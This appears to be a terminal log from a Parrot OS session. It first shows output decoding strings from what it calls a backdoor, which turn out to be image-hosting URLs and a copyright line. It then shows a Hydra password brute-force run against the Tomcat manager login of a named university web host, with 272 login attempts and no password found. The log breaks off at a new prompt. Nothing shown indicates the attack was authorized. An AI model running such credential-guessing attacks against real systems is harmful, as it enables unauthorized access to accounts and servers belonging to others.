=== DECODIFICACIÓN COMPLETA DEL BACKDOOR ===
Codificado: 9]]w
Decodificado: http
---
Codificado: by9N3y3]!rf7@!fl8b[Y!dUNBhgwdZbg[YNfl8b[Y!!
Decodificado: //img830.imageshack.us/img830/2906/tono.png
---
Codificado: by9NCgCdY!ll8@!>fib[Y!dUNBhgwdZbg[YN>fib[Y!!
Decodificado: //img405.imageshack.us/img405/2833/israr.png
---
Codificado: by9N3tygUt!ii8>!@l8b[Y!dUNBhgwdZbg[YN@l8b[Y!!
Decodificado: //img832.imageshack.us/img832/5844/juanjo.png
---
Codificado: by9NsZXygx!18rM!@M8b[Y!dUNBhgwdZbg[YN@M8b[Y!!
Decodificado: //img812.imageshack.us/img812/1687/danyel.png
---
Codificado: whygJ9(*I*9dsXyxa*I*-D!z9(*sZXygp-Dz*HQ(S*I*fMf@*]wbYCX93h
Decodificado: copyright 2010 - ISCT <b>Danyel Sp</b> - @dnylsp - SpRanch
---
=== BUSCANDO PATRONES ===
POSIBLE URL/EMAIL: http
POSIBLE URL/EMAIL: copyright 2010 - ISCT <b>Danyel Sp</b> - @dnylsp - SpRanch

┌─[marcos_os@parrot]─[~/Desktop/ProyectoSito/NuevoComienzo/Hydra]
└──╼ $hydra -L users_custom.txt -P passes_custom.txt sito.utslp.edu.mx https-get /manager/html
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-03 22:19:09
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 272 login tries (l:16/p:17), ~17 tries per task
[DATA] attacking http-gets://sito.utslp.edu.mx:443/manager/html
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-03 22:19:52
┌─[marcos_os@
